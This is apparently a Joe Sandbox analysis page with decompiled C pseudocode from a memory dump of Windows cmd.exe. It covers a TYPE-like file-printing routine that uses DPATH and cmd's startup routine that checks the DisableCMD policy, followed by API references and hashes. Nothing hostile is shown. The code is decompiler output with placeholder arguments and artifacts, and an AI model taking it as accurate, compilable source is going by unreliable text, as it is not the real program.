			E001D65A0(WCHAR* __edx, WCHAR* _a4, long _a8, WCHAR* _a12, long _a16, signed int _a20, int _a24, short* _a28, void* _a32, signed int _a36, signed int _a40, WCHAR* _a44, WCHAR* _a48, void* _a52, long _a56, char _a60, intOrPtr _a68, void _a72, void* _a592, char _a596, long _a600, void _a608, void _a610, short _a1128, signed int _a4204) {
				void* _v0;
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t137;
				WCHAR* _t150;
				void* _t155;
				long _t157;
				WCHAR* _t160;
				signed int _t161;
				WCHAR* _t164;
				void* _t172;
				long _t174;
				WCHAR* _t175;
				signed int _t176;
				WCHAR* _t178;
				long _t181;
				WCHAR* _t182;
				WCHAR* _t183;
				WCHAR* _t184;
				void* _t190;
				long _t192;
				WCHAR* _t195;
				int _t197;
				void* _t198;
				WCHAR* _t199;
				void* _t202;
				WCHAR* _t206;
				long _t208;
				void* _t212;
				void* _t213;
				void* _t222;
				unsigned int _t226;
				WCHAR* _t228;
				void* _t232;
				unsigned int _t234;
				void* _t235;
				long _t245;
				int _t246;
				WCHAR* _t251;
				WCHAR* _t252;
				signed char* _t254;
				intOrPtr _t257;
				WCHAR* _t258;
				union _LARGE_INTEGER _t263;
				void* _t264;
				void* _t266;
				void* _t267;
				int _t268;
				WCHAR* _t269;
				signed int _t270;
				signed int _t273;
				signed int _t274;
				signed int _t275;

				_t253 = __edx;
				_t274 = _t273 & 0xfffffff8;
				E001C8290(0x1074);
				_t137 =  *0x1dd0b4; // 0xea614d48
				_a4204 = _t137 ^ _t274;
				_a56 = _a56 | 0xffffffff;
				_t262 = _a4;
				_a600 = 0x104;
				_a48 = _a4;
				_t266 = 0;
				_a52 = 0;
				_t212 = 1;
				_a20 = 0;
				_a60 = 0x7fffffff;
				_a32 = 0;
				_a36 = 0;
				_a40 = 1;
				_a592 = 0;
				_a596 = 1;
				memset( &_a72, 0, 0x104);
				_t275 = _t274 + 0xc;
				if(E001C0C70( &_a72, ((0 | _a596 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t253 = 0;
					_t263 = E001BD120(_t262, 0,  &_a72);
					__eflags = _t263 - 0xffffffff;
					if(_t263 != 0xffffffff) {
						L13:
						_a28 =  &_a608;
						_t150 = E001C0178( &_a608);
						__eflags = _t150;
						if(_t150 == 0) {
							_t202 =  &_a60;
							__imp___get_osfhandle(_t202);
							_a56 = GetFileSize(_t202, _t263);
							__imp___get_osfhandle(0);
							SetFilePointer(0, _t263, 0, 0);
							_t30 =  &_a36;
							 *_t30 = _a36 & _t266;
							__eflags =  *_t30;
							_a32 = _t212;
						}
						while(1) {
							L15:
							__eflags =  *0x1dd544;
							if( *0x1dd544 != 0) {
								break;
							}
							_t155 =  &_a608;
							__imp___get_osfhandle(_t155, 0x200,  &_a4, 0);
							_t222 = _t263;
							_t156 = ReadFile(_t155, ??, ??, ??, ??);
							__eflags = _t156;
							if(_t156 == 0) {
								L81:
								_t157 = GetLastError();
								_push(0);
								_push(_t157);
								 *0x1f3cf0 = _t157;
								E001BC5A2(_t222);
								L82:
								E001BDB92(_t263);
								_t212 = 0;
								goto L87;
							}
							_t226 = _a4;
							__eflags = _t226;
							if(_t226 == 0) {
								goto L82;
							}
							__eflags = _a40;
							if(_a40 == 0) {
								L21:
								_a24 = _t226;
								__eflags = _t266;
								if(_t266 == 0) {
									L25:
									_t160 = E001C269C(_t156);
									__eflags = _t160;
									if(_t160 != 0) {
										L28:
										_t268 = _a4;
										_t254 =  &_a608;
										_t228 = _t268;
										__eflags = _t268;
										while(1) {
											_a12 = _t228;
											if(__eflags == 0) {
												break;
											}
											_t161 =  *_t254 & 0x000000ff;
											__eflags =  *((char*)(_t161 + 0x1f7f30));
											if( *((char*)(_t161 + 0x1f7f30)) == 0) {
												L31:
												_t254 =  &(_t254[1]);
												_t228 = _t228 - 1;
												__eflags = _t228;
												continue;
											}
											_t253 =  &(_t254[1]);
											_t228 = _t228 - 1;
											__eflags = _t228;
											_a12 = _t228;
											if(_t228 == 0) {
												_t198 =  &_a12;
												__imp___get_osfhandle(_t253, _t212, _t198, 0);
												_t222 = _t263;
												_t199 = ReadFile(_t198, ??, ??, ??, ??);
												__eflags = _t199;
												if(_t199 == 0) {
													goto L81;
												}
												_t268 =  &(_a4[0]);
												__eflags = _t268;
												_a4 = _t268;
												_a24 = _t268;
												L36:
												_a28 = _a28 & 0x00000000;
												_t253 =  &_a608;
												_t164 = E001D6CEF(_t212,  &_a608,  &_a24,  &_a28);
												__eflags = _t164;
												if(_t164 != 0) {
													L39:
													_t269 = MultiByteToWideChar( *0x1e3854, 0,  &_a608, _t268,  &_a1128, 0x400);
													_a12 = _t269;
													__eflags = _t269;
													if(_t269 == 0) {
														_t269 = 0x400;
														_a12 = 0x400;
													}
													_t226 = _a4;
													_a28 =  &_a1128;
													L42:
													__eflags = _a40;
													if(_a40 != 0) {
														__eflags =  *0x1f3cd0;
														if( *0x1f3cd0 != 0) {
															E001BC5A2(_t226, 0x2354, _t212, _a48);
															_t226 = _a4;
															_t275 = _t275 + 0xc;
															_t269 = _a12;
														}
														_t75 =  &_a40;
														 *_t75 = _a40 & 0x00000000;
														__eflags =  *_t75;
													}
													_v0 = _a28;
													__eflags = _t269;
													if(_t269 <= 0) {
														L74:
														_t270 = _a32;
														_t253 = _a36;
														__eflags = _t270 | _t253;
														if((_t270 | _t253) != 0) {
															_t172 =  &_a32;
															__imp___get_osfhandle(_t172, _t212);
															SetFilePointerEx(_t172, _t263, 0, 0);
															_t253 = _a36;
															_t270 = _a32;
															_t226 = _a4;
														}
														__eflags = _t226 - _a24;
														if(_t226 != _a24) {
															goto L82;
														} else {
															__eflags = _a60 - _t253;
															if(__eflags < 0) {
																goto L82;
															}
															if(__eflags > 0) {
																L80:
																_t266 = _a20;
																goto L15;
															}
															__eflags = _a56 - _t270;
															if(_a56 <= _t270) {
																goto L82;
															}
															goto L80;
														}
													} else {
														do {
															_t174 = 0x50;
															__eflags = _t269 - _t174;
															if(_t269 <= _t174) {
																_a8 = _t269;
																__eflags = _t269;
																if(_t269 == 0) {
																	break;
																}
																L50:
																__eflags =  *0x1dd544;
																if( *0x1dd544 != 0) {
																	goto L86;
																}
																_t175 = E001C269C(_t174);
																__eflags = _t175;
																if(_t175 == 0) {
																	__eflags =  *0x1f805c;
																	if( *0x1f805c != 0) {
																		__eflags = _a20;
																		if(_a20 == 0) {
																			_t176 = _a8;
																			_t232 = _v0;
																			L62:
																			_a68 = _t176 + _t176;
																			_t178 = E001C27C8(_t176 + _t176, _t232, _t176 + _t176,  &_a16);
																			__eflags = _a12;
																			_t257 = _v8;
																			_a36 = _t178;
																			if(_a12 != 0) {
																				 *((short*)(_a68 + _t257)) = _a52;
																			}
																			_t234 = _a16;
																			_t269 = _t269 - (_t234 >> 1);
																			_t181 = _a8;
																			_t258 = _t257 + _t234;
																			__eflags = _t258;
																			_v0 = _t258;
																			L65:
																			_t253 = _a44;
																			L66:
																			__eflags = _t253;
																			if(_t253 == 0) {
																				L68:
																				_t182 = GetLastError();
																				 *0x1f3cf0 = _t182;
																				__eflags = _t182;
																				if(_t182 == 0) {
																					 *0x1f3cf0 = 0x70;
																				}
																				_t235 = _t212;
																				_t183 = E001C0178(_t182);
																				__eflags = _t183;
																				if(_t183 == 0) {
																					_t236 = _t212;
																					_t184 = E001D9953(_t183, _t212);
																					__eflags = _t184;
																					if(_t184 == 0) {
																						E001D985A( *0x1f3cf0);
																					} else {
																						_push(0);
																						_push(0x2364);
																						E001BC5A2(_t236);
																					}
																					goto L86;
																				} else {
																					_push(0);
																					_push(0x1d);
																					E001BC5A2(_t235);
																					goto L72;
																				}
																			}
																			__eflags = _t234 - _t181 + _t181;
																			if(_t234 == _t181 + _t181) {
																				goto L72;
																			}
																			goto L68;
																		}
																		L60:
																		_t176 = _a8;
																		_t232 = _v0;
																		_a52 =  *(_t232 + _t176 * 2) & 0x0000ffff;
																		 *(_t232 + _t176 * 2) = 0;
																		goto L62;
																	}
																	__eflags = _a20;
																	if(_a20 != 0) {
																		goto L60;
																	}
																	_t190 = _a8;
																	L58:
																	__imp___get_osfhandle(0);
																	_t253 = WriteFile(_t190, _t212, _v0, _t190,  &_a16);
																	_t192 = _a16;
																	_t269 = _t269 - _t192;
																	_v0 = _v0 + _t192;
																	_t234 = _t192 + _t192;
																	_t181 = _a8;
																	_a16 = _t234;
																	goto L66;
																}
																_t195 = WriteConsoleW(GetStdHandle(0xfffffff5), _v0, _a8,  &_a16, 0);
																_a44 = _t195;
																__eflags = _t195;
																_t190 = _a8;
																if(_t195 == 0) {
																	goto L58;
																}
																_t245 = _a16;
																__eflags = _t245 - _t190;
																if(_t245 != _t190) {
																	goto L58;
																}
																_t269 = _t269 - _t245;
																_t234 = _t245 + _t245;
																_v0 = _v0 + _t234;
																_a16 = _t234;
																goto L65;
															}
															_a8 = _t174;
															goto L50;
															L72:
															__eflags = _t269;
														} while (_t269 > 0);
														_t226 = _a4;
														goto L74;
													}
												}
												_t197 = _a24;
												__eflags = _t197;
												if(_t197 == 0) {
													goto L82;
												}
												_t268 = _t197;
												goto L39;
											}
											goto L31;
										}
										goto L36;
									}
									__eflags =  *0x1f805c - _t160;
									if( *0x1f805c != _t160) {
										goto L28;
									}
									_t226 = _a4;
									_t269 = _t226;
									L23:
									_a12 = _t269;
									goto L42;
								}
								_t269 = _t226 >> 1;
								__eflags = _t269;
								goto L23;
							}
							_t156 = 0xfeff;
							__eflags = _a608 - 0xfeff;
							if(_a608 != 0xfeff) {
								_t45 =  &_a20;
								 *_t45 = _a20 & 0x00000000;
								__eflags =  *_t45;
								_a24 = _t226;
								goto L25;
							}
							_t246 = _t226 - 2;
							__eflags = _t246;
							_a4 = _t246;
							_t266 = _t212;
							_a20 = _t266;
							_t156 = memmove( &_a608,  &_a610, _t246);
							_t226 = _a4;
							_t275 = _t275 + 0xc;
							goto L21;
						}
						L86:
						E001BDB92(_t263);
						goto L87;
					}
					_t206 = E001C3320(L"DPATH");
					__eflags = _t206;
					if(_t206 == 0) {
						L11:
						_t250 =  *0x1f3cf0;
						__eflags =  *0x1f3cf0 - 0x7b;
						if( *0x1f3cf0 == 0x7b) {
							_t250 = 2;
							 *0x1f3cf0 = _t250;
						}
						goto L2;
					}
					_t251 = _a592;
					__eflags = _t251;
					if(_t251 == 0) {
						_t251 =  &_a72;
					}
					_t208 = SearchPathW(_t206, _a48, 0, _a600, _t251, 0);
					__eflags = _t208;
					if(_t208 == 0) {
						goto L11;
					}
					_t252 = _a592;
					__eflags = _t252;
					if(_t252 == 0) {
						_t252 =  &_a72;
					}
					_t253 = 0;
					_t263 = E001BD120(_t252, 0, _t252);
					__eflags = _t263 - 0xffffffff;
					if(_t263 != 0xffffffff) {
						goto L13;
					} else {
						goto L11;
					}
				} else {
					_t250 = 8;
					L2:
					E001D985A(_t250);
					L87:
					__imp__??_V@YAXPAX@Z(_a592);
					_pop(_t264);
					_pop(_t267);
					_pop(_t213);
					return E001C6FD0(_t212, _t213, _a4204 ^ _t275, _t253, _t264, _t267);
				}
			}

0x001d65a0
0x001d65a5
0x001d65ad
0x001d65b2
0x001d65b9
0x001d65c0
0x001d65ca
0x001d65d3
0x001d65e1
0x001d65e5
0x001d65e7
0x001d65eb
0x001d65ec
0x001d65f1
0x001d65f9
0x001d65fd
0x001d6601
0x001d6605
0x001d660c
0x001d6613
0x001d661e
0x001d663e
0x001d664e
0x001d6657
0x001d6659
0x001d665c
0x001d66cd
0x001d66d6
0x001d66da
0x001d66df
0x001d66e1
0x001d66e3
0x001d66e9
0x001d66f7
0x001d6701
0x001d6709
0x001d670f
0x001d670f
0x001d670f
0x001d6713
0x001d6713
0x001d6717
0x001d6717
0x001d6717
0x001d671e
0x00000000
0x00000000
0x001d6730
0x001d6739
0x001d673f
0x001d6741
0x001d6747
0x001d6749
0x001d6aad
0x001d6aad
0x001d6ab3
0x001d6ab5
0x001d6ab6
0x001d6abb
0x001d6ac2
0x001d6ac4
0x001d6ac9
0x00000000
0x001d6ac9
0x001d674f
0x001d6753
0x001d6755
0x00000000
0x00000000
0x001d675b
0x001d6760
0x001d679c
0x001d679c
0x001d67a0
0x001d67a2
0x001d67ba
0x001d67bc
0x001d67c1
0x001d67c3
0x001d67d5
0x001d67d5
0x001d67d9
0x001d67e0
0x001d67e2
0x001d6800
0x001d6800
0x001d6804
0x00000000
0x00000000
0x001d67e6
0x001d67e9
0x001d67f0
0x001d67fc
0x001d67fc
0x001d67fd
0x001d67fd
0x00000000
0x001d67fd
0x001d67f2
0x001d67f3
0x001d67f3
0x001d67f6
0x001d67fa
0x001d680a
0x001d6812
0x001d6818
0x001d681a
0x001d6820
0x001d6822
0x00000000
0x00000000
0x001d682c
0x001d682c
0x001d682d
0x001d6831
0x001d6835
0x001d6835
0x001d6846
0x001d684d
0x001d6852
0x001d6854
0x001d6864
0x001d6888
0x001d688a
0x001d688e
0x001d6890
0x001d6892
0x001d6897
0x001d6897
0x001d689b
0x001d68a6
0x001d68aa
0x001d68aa
0x001d68af
0x001d68b1
0x001d68b8
0x001d68c4
0x001d68c9
0x001d68cd
0x001d68d0
0x001d68d0
0x001d68d4
0x001d68d4
0x001d68d4
0x001d68d4
0x001d68dd
0x001d68e1
0x001d68e3
0x001d6a5d
0x001d6a5d
0x001d6a63
0x001d6a67
0x001d6a69
0x001d6a6c
0x001d6a76
0x001d6a7e
0x001d6a84
0x001d6a88
0x001d6a8c
0x001d6a8c
0x001d6a90
0x001d6a94
0x00000000
0x001d6a96
0x001d6a96
0x001d6a9a
0x00000000
0x00000000
0x001d6a9c
0x001d6aa4
0x001d6aa4
0x00000000
0x001d6aa4
0x001d6a9e
0x001d6aa2
0x00000000
0x00000000
0x00000000
0x001d6aa2
0x001d68e9
0x001d68e9
0x001d68eb
0x001d68ec
0x001d68ee
0x001d68f6
0x001d68fa
0x001d68fc
0x00000000
0x00000000
0x001d6902
0x001d6902
0x001d6909
0x00000000
0x00000000
0x001d6911
0x001d6916
0x001d6918
0x001d695d
0x001d6964
0x001d69a5
0x001d69aa
0x001d69c4
0x001d69c8
0x001d69cc
0x001d69d5
0x001d69dc
0x001d69e1
0x001d69e6
0x001d69ea
0x001d69ee
0x001d69f8
0x001d69f8
0x001d69fc
0x001d6a04
0x001d6a06
0x001d6a0a
0x001d6a0a
0x001d6a0c
0x001d6a10
0x001d6a10
0x001d6a14
0x001d6a14
0x001d6a16
0x001d6a1e
0x001d6a1e
0x001d6a24
0x001d6a29
0x001d6a2b
0x001d6a2d
0x001d6a2d
0x001d6a37
0x001d6a39
0x001d6a3e
0x001d6a40
0x001d6acd
0x001d6acf
0x001d6ad4
0x001d6ad6
0x001d6aee
0x001d6ad8
0x001d6ad8
0x001d6ada
0x001d6adf
0x001d6ae5
0x00000000
0x001d6a46
0x001d6a46
0x001d6a48
0x001d6a4a
0x00000000
0x001d6a50
0x001d6a40
0x001d6a1a
0x001d6a1c
0x00000000
0x00000000
0x00000000
0x001d6a1c
0x001d69ac
0x001d69ac
0x001d69b0
0x001d69b8
0x001d69be
0x00000000
0x001d69be
0x001d6966
0x001d696b
0x00000000
0x00000000
0x001d696d
0x001d6971
0x001d697e
0x001d698c
0x001d698e
0x001d6992
0x001d6994
0x001d6998
0x001d699b
0x001d699f
0x00000000
0x001d699f
0x001d6932
0x001d6938
0x001d693c
0x001d693e
0x001d6942
0x00000000
0x00000000
0x001d6944
0x001d6948
0x001d694a
0x00000000
0x00000000
0x001d694c
0x001d694e
0x001d6950
0x001d6954
0x00000000
0x001d6954
0x001d68f0
0x00000000
0x001d6a51
0x001d6a51
0x001d6a51
0x001d6a59
0x00000000
0x001d6a59
0x001d68e3
0x001d6856
0x001d685a
0x001d685c
0x00000000
0x00000000
0x001d6862
0x00000000
0x001d6862
0x00000000
0x001d67fa
0x00000000
0x001d6806
0x001d67c5
0x001d67cb
0x00000000
0x00000000
0x001d67cd
0x001d67d1
0x001d67a8
0x001d67a8
0x00000000
0x001d67a8
0x001d67a6
0x001d67a6
0x00000000
0x001d67a6
0x001d6762
0x001d6767
0x001d676f
0x001d67b1
0x001d67b1
0x001d67b1
0x001d67b6
0x00000000
0x001d67b6
0x001d6771
0x001d6771
0x001d6784
0x001d6788
0x001d678b
0x001d678f
0x001d6795
0x001d6799
0x00000000
0x001d6799
0x001d6af3
0x001d6af5
0x00000000
0x001d6af5
0x001d6663
0x001d6668
0x001d666a
0x001d66b4
0x001d66b4
0x001d66ba
0x001d66bd
0x001d66c1
0x001d66c2
0x001d66c2
0x00000000
0x001d66bd
0x001d666c
0x001d6673
0x001d6675
0x001d6677
0x001d6677
0x001d668c
0x001d6692
0x001d6694
0x00000000
0x00000000
0x001d6696
0x001d669d
0x001d669f
0x001d66a1
0x001d66a1
0x001d66a6
0x001d66ad
0x001d66af
0x001d66b2
0x00000000
0x00000000
0x00000000
0x00000000
0x001d6640
0x001d6642
0x001d6643
0x001d6643
0x001d6afa
0x001d6b01
0x001d6b11
0x001d6b12
0x001d6b13
0x001d6b1e
0x001d6b1e

APIs

memset.MSVCRT ref: 001D6613

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000105), ref: 001D668C
??_V@YAXPAX@Z.MSVCRT ref: 001D6B01

Part of subcall function 001C0178: _get_osfhandle.MSVCRT ref: 001C0183
Part of subcall function 001C0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001CD6A1), ref: 001C018D

_get_osfhandle.MSVCRT ref: 001D66E9
GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 001D66F1
_get_osfhandle.MSVCRT ref: 001D6701
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001D6709

Part of subcall function 001C269C: _get_osfhandle.MSVCRT ref: 001C26A7
Part of subcall function 001C269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001BC5F8,?,?,?), ref: 001C26B6
Part of subcall function 001C269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001BC5C6), ref: 001C26D2
Part of subcall function 001C269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20,00000002), ref: 001C26E1
Part of subcall function 001C269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001C26EC
Part of subcall function 001C269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001BC5C6), ref: 001C26F5

_get_osfhandle.MSVCRT ref: 001D6739
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 001D6741
memmove.MSVCRT ref: 001D678F
_get_osfhandle.MSVCRT ref: 001D6812
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001D681A
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,?,?,00000400,00000000,00000000), ref: 001D6882
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,00000000), ref: 001D692B
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001D6932
_get_osfhandle.MSVCRT ref: 001D697E
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001D6986
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?), ref: 001D6A1E
_get_osfhandle.MSVCRT ref: 001D6A76
SetFilePointerEx.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001D6A7E
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001D6AAD

Part of subcall function 001D9953: _get_osfhandle.MSVCRT ref: 001D9956
Part of subcall function 001D9953: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001D995E

Strings

DPATH, xrefs: 001D665E

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: File_get_osfhandle$Type$ConsoleErrorHandleLastLockPointerReadSharedWritememset$AcquireByteCharModeMultiPathReleaseSearchSizeWidememmove
String ID: DPATH
API String ID: 1247154890-2010427443
Opcode ID: 346a82e08324afb7fe3c41d9b73f85f5082ea04ae444de125e722e3caaff6516
Instruction ID: 3170cd5abf3adf1b7e0ebae16a2d6250583864e9dcb22416c5b501b02443dc3e
Opcode Fuzzy Hash: 346a82e08324afb7fe3c41d9b73f85f5082ea04ae444de125e722e3caaff6516
Instruction Fuzzy Hash: F2F18B71A083419FDB28DF24D884B6BB7E8BB98714F044A2EF99597390EB70D944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 001C44FC Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 242
registrythreadmemoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E001C44FC() {
				signed int _v8;
				char _v24;
				int _v28;
				char _v29;
				char _v36;
				void* _v40;
				int _v44;
				int _v48;
				int _v52;
				signed int _t26;
				void* _t39;
				int _t44;
				intOrPtr _t48;
				int _t51;
				int _t53;
				intOrPtr _t55;
				int _t59;
				int _t64;
				void* _t73;
				void* _t75;
				intOrPtr _t82;
				void* _t84;
				void* _t95;
				int _t96;
				signed int _t97;
				signed int _t98;

				_t26 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t26 ^ _t98;
				_v44 = 0;
				 *0x1eb938 = OpenThread(0x1fffff, 0, GetCurrentThreadId());
				E001C465D(_t75);
				__imp__HeapSetInformation(0, 1, 0, 0, _t95, _t97, _t73);
				_v36 = 0;
				if(RegOpenKeyExW(0x80000001, L"Software\\Policies\\Microsoft\\Windows\\System", 0, 0x20019,  &_v40) == 0) {
					_v48 = 4;
					RegQueryValueExW(_v40, L"DisableCMD", 0,  &_v52,  &_v36,  &_v48);
					RegCloseKey(_v40);
				}
				 *0x1dd614 = 1;
				_t93 = 0x1dd600;
				 *0x1dd610 =  &_v29;
				_t39 = E001C4719(0x1dd600);
				asm("sbb al, al");
				 *0x1dd614 =  *0x1dd614 &  ~(_t39 - 1);
				E001C46D8();
				_v28 = 0;
				_t96 =  &_v24;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t44 = E001C3D27(0,  &_v24);
				if(_v36 == 1) {
					_push(0);
					_push(0x40002729);
					E001BC108( &_v24);
					E001D3BB0(__eflags, 0);
					do {
						__eflags = E001C4B60(__eflags, 0);
					} while (__eflags == 0);
					exit(0xff);
					goto L13;
				} else {
					_t96 = 0xff;
					if(_t44 == 0) {
						L29:
						_push(0);
						L001C82C1();
						_v28 = _t44;
						_t84 = 0x1eb8b8;
						_t97 = 2;
						__eflags = _t44;
						if(_t44 == 0) {
							L33:
							__eflags = _v36 - _t97;
							if(_v36 != _t97) {
								_t55 = E001C0178(_t44);
								__eflags = _t55;
								if(_t55 == 0) {
									_t97 = 3;
									__imp___setmode(0x8000);
									0 = 0;
								}
								E001BB2B0(0, 0);
								while(1) {
									L40:
									 *0x1dd590 = 0;
									EnterCriticalSection( *0x1e3858);
									 *0x1dd544 = 0;
									LeaveCriticalSection( *0x1e3858);
									_t93 = 0;
									_t86 = _t97;
									_t96 = E001BEEF0(_t97, 0, 0);
									__eflags = _t96 - 1;
									if(_t96 == 1) {
										continue;
									}
									L41:
									__eflags = _t96 - 0xffffffff;
									if(__eflags == 0) {
										do {
											__eflags = E001C4B60(__eflags, 0);
										} while (__eflags == 0);
										L25:
										exit(0);
										L13:
										L14:
										_t48 = E001BEEF0(1, _t93,  *0x1f3cd8);
										if(_t48 == 1) {
											do {
												__eflags = E001C4B60(__eflags, 0);
											} while (__eflags == 0);
											exit(1);
											goto L13;
										}
										if(_t48 == 0xffffffff) {
											do {
												__eflags = E001C4B60(__eflags, 0);
											} while (__eflags == 0);
											goto L25;
										}
										_t93 = _t48;
										_t51 = E001C0E00(0, _t48);
										if(_t51 != 0) {
											_v28 = _t51;
										}
										L8:
										_t97 = _t97 + 1;
										if(_t97 < 3) {
											L7:
											_t93 =  *((intOrPtr*)(_t98 + _t97 * 4 - 0x14));
											if( *((intOrPtr*)(_t98 + _t97 * 4 - 0x14)) != 0) {
												goto L14;
											}
											goto L8;
										}
										E001C06C0(0);
										_t53 = GetConsoleOutputCP();
										 *0x1e3854 = _t53;
										GetCPInfo(_t53, 0x1e3840);
										_t44 = E001C465D(0);
										_t82 =  *0x1f3ccc;
										L10:
										_t106 = _t82;
										if(_t82 == 0) {
											 *0x1f8058 = 0;
											goto L29;
										} else {
											goto L11;
										}
										do {
											L11:
										} while (E001C4B60(_t106, 0) == 0);
										exit(_v28);
										goto L13;
									}
									EnterCriticalSection( *0x1e3858);
									 *0x1dd544 = 0;
									LeaveCriticalSection( *0x1e3858);
									_t59 = GetConsoleOutputCP();
									 *0x1e3854 = _t59;
									GetCPInfo(_t59, 0x1e3840);
									E001C465D(_t86);
									E001C0E00(0, _t96);
									 *0x1dd59c = 0;
									E001C06C0(0);
									_t64 = GetConsoleOutputCP();
									 *0x1e3854 = _t64;
									GetCPInfo(_t64, 0x1e3840);
									E001C465D(0);
									do {
										goto L40;
									} while (_t96 == 1);
									goto L41;
									L40:
									 *0x1dd590 = 0;
									EnterCriticalSection( *0x1e3858);
									 *0x1dd544 = 0;
									LeaveCriticalSection( *0x1e3858);
									_t93 = 0;
									_t86 = _t97;
									_t96 = E001BEEF0(_t97, 0, 0);
									__eflags = _t96 - 1;
								}
							}
							_push(0);
							_push(0x40002729);
							E001BC108(_t84);
							E001D3BB0(__eflags, 0);
							do {
								__eflags = E001C4B60(__eflags, 0);
							} while (__eflags == 0);
							exit(_t96);
							goto L13;
						}
						__eflags = _t44 - _t97;
						if(__eflags != 0) {
							goto L33;
						} else {
							goto L31;
						}
						do {
							L31:
							__eflags = E001C4B60(__eflags, 0);
						} while (__eflags == 0);
						goto L25;
					}
					_push(0);
					_push(0x1eb8b8);
					L001C82C1();
					_t82 =  *0x1f3ccc;
					if(_t44 != 0) {
						_t44 = 1;
						_v44 = 1;
						__eflags = _t82;
						if(__eflags != 0) {
							_v28 = 0xff;
						}
					} else {
						_t44 = _v44;
					}
					if(_t44 != 0) {
						goto L10;
					} else {
						_t97 = 0;
						goto L7;
					}
				}
			}

0x001c4504
0x001c450b
0x001c4513
0x001c4529
0x001c452e
0x001c4538
0x001c4541
0x001c455d
0x001ce6ee
0x001ce707
0x001ce710
0x001ce710
0x001c4566
0x001c456d
0x001c4572
0x001c4577
0x001c457f
0x001c4581
0x001c4587
0x001c458e
0x001c4591
0x001c4594
0x001c4598
0x001c4599
0x001c459a
0x001c459b
0x001c45a4
0x001ce71b
0x001ce71c
0x001ce721
0x001ce729
0x001ce72e
0x001ce734
0x001ce734
0x001c4625
0x00000000
0x001c45aa
0x001c45aa
0x001c45b1
0x001ce77f
0x001ce77f
0x001ce785
0x001ce78a
0x001ce78e
0x001ce791
0x001ce792
0x001ce794
0x001ce7a6
0x001ce7a6
0x001ce7a9
0x001ce7d0
0x001ce7d5
0x001ce7d7
0x001ce7db
0x001ce7e2
0x001ce7e9
0x001ce7e9
0x001ce7eb
0x001ce7f0
0x001ce7f0
0x001ce7f6
0x001ce7fc
0x001ce808
0x001ce80e
0x001ce815
0x001ce817
0x001ce81e
0x001ce820
0x001ce823
0x00000000
0x00000000
0x001ce825
0x001ce825
0x001ce828
0x001ce899
0x001ce89f
0x001ce89f
0x001ce762
0x001c4625
0x001c4625
0x001c462b
0x001c4634
0x001c463c
0x001ce768
0x001ce76e
0x001ce76e
0x001c4625
0x00000000
0x001c4625
0x001c4645
0x001ce758
0x001ce75e
0x001ce75e
0x00000000
0x001ce758
0x001c464b
0x001c464f
0x001c4656
0x001c4658
0x001c4658
0x001c45e3
0x001c45e3
0x001c45e7
0x001c45db
0x001c45db
0x001c45e1
0x00000000
0x00000000
0x00000000
0x001c45e1
0x001c45e9
0x001c45ee
0x001c45fa
0x001c45ff
0x001c4605
0x001c460a
0x001c4610
0x001c4610
0x001c4612
0x001ce779
0x00000000
0x00000000
0x00000000
0x00000000
0x001c4618
0x001c4618
0x001c461e
0x001c4625
0x00000000
0x001c4625
0x001ce830
0x001ce83c
0x001ce842
0x001ce848
0x001ce854
0x001ce859
0x001ce85f
0x001ce868
0x001ce86d
0x001ce873
0x001ce878
0x001ce884
0x001ce889
0x001ce88f
0x001ce7f0
0x00000000
0x00000000
0x00000000
0x001ce7f0
0x001ce7f6
0x001ce7fc
0x001ce808
0x001ce80e
0x001ce815
0x001ce817
0x001ce81e
0x001ce820
0x001ce820
0x001ce7f0
0x001ce7ab
0x001ce7ac
0x001ce7b1
0x001ce7b9
0x001ce7be
0x001ce7c4
0x001ce7c4
0x001c4625
0x00000000
0x001c4625
0x001ce796
0x001ce798
0x00000000
0x00000000
0x00000000
0x00000000
0x001ce79a
0x001ce79a
0x001ce7a0
0x001ce7a0
0x00000000
0x001ce7a4
0x001c45b7
0x001c45b8
0x001c45bd
0x001c45c4
0x001c45cc
0x001ce744
0x001ce745
0x001ce748
